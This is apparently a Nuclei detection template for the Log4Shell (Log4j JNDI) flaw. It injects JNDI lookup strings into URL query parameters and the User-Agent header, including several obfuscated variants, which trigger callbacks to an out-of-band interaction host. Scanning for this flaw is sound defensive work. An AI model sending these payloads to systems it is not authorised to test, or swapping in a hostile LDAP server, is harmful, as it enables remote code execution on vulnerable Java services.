id: log4jshell-detect

info:
  name: Log4j Detect for Logs
  author: ELSFA7110
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?test=${jndi:ldap://{{interactsh-url}}/a}"
      - "{{BaseURL}}/?test=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?test=${${::-j}ndi:rmi://{{interactsh-url}}/ass}"
      - "{{BaseURL}}/?test=${jndi:rmi://{{interactsh-url}}}"
      - "{{BaseURL}}/?test=${${lower:jndi}:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?test=${${lower:${lower:jndi}}:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?test=${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{interactsh-url}}/poc}"
      - "{{BaseURL}}/?test=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{interactsh-url}}/poc}"

    headers:
      Host: "{{Host}}"
      User-Agent: "Mozilla ${jndi:ldap://{{interactsh-url}}/a}"

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
